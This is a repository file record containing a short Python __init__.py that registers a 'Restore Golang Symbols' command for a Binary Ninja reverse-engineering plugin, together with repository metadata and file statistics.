2484b713073294f833a7aedb426225a3f08b5595 | 299 | py | Python | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 9 | 2020-06-15T09:14:18.000Z | 2021-12-30T19:39:33.000Z | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 3 | 2020-06-10T03:29:26.000Z | 2021-02-08T19:25:51.000Z | __init__.py | d-we/binja-golang-symbol-restore | 251cc45cab66512fd404eaf69ec6e018684aa5d4 | [
"MIT"
] | 3 | 2020-08-15T16:01:14.000Z | 2020-10-14T21:48:32.000Z | import binaryninja
from .golang_symbol_restore import restore_golang_symbols
binaryninja.plugin.PluginCommand.register("Restore Golang Symbols",
                                          "Restore Golang symbol names in the binary.",
                                          restore_golang_symbols)
| 42.714286 | 86 | 0.622074 | 25 | 299 | 7.2 | 0.6 | 0.216667 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.334448 | 299 | 6 | 87 | 49.833333 | 0.904523 | 0 | 0 | 0 | 0 | 0 | 0.210702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |